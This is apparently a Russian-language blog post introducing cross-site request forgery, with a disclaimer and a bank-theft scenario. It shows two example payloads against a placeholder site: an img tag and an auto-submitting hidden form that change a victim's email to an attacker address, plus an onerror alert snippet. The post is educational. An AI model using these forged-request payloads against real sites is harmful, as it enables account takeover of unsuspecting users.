Найти в Дзене
Info Пингвин

CSRF знакомство (000_begin)

Дисклеймер

Информация, представленная в данной статье, предназначена исключительно для образовательных и информационных целей. Автор не несет ответственности за использование представленных сведений в противоправных или неэтичных целях.

Пример csrf атаки на пользователя 
Пример csrf атаки на пользователя 


Применение полученных знаний должно осуществляться строго в рамках действующего законодательства и исключительно для повышения уровня безопасности информационных систем, защиты данных и предотвращения возможных атак.

Используйте информацию ответственно, уважая права и конфиденциальность других лиц.

Начинаем
CSRF - тараканчик позволяющий нам подделывать запросы между сайтом, который подконтролен злоумышленнику и целевым сайтом, которым пользуется юзер;

Кейс
Вы сидите на сайте банка, и вам кто-нибудь отправляет ссылку на страничку с котиком, вы переходите а деньги с вашего счёта улетают от вас, ХРЕНОВО!
Не то слово, но давайте разберёмся как выглядит самая простая атака;

<img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">

Что мы тут видим? У нас отправляет GET запрос, на сайт с уязвимостью, позволяющий подменить почту; Если подушнить, то это приколюха в img идет по src адресочку и пытается выгрузить "картиночку", также в тэге есть атрибут on_error (еще существуют другие), в который можно подпихнуть, всем горячо любимый onerror=alert("oh_my_god_this_site_HACKED");
Как будет выглядеть идея в целом по фен-шую через POST запрос:

<html>
<body>
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

===

Если у вас есть вопросы, а также пожелания, пожалуйста оставьте свой комментарий;
Мой канал телеграм:
https://t.me/devops_talk1ng
Ютуб канал:
https://www.youtube.com/@devops_vault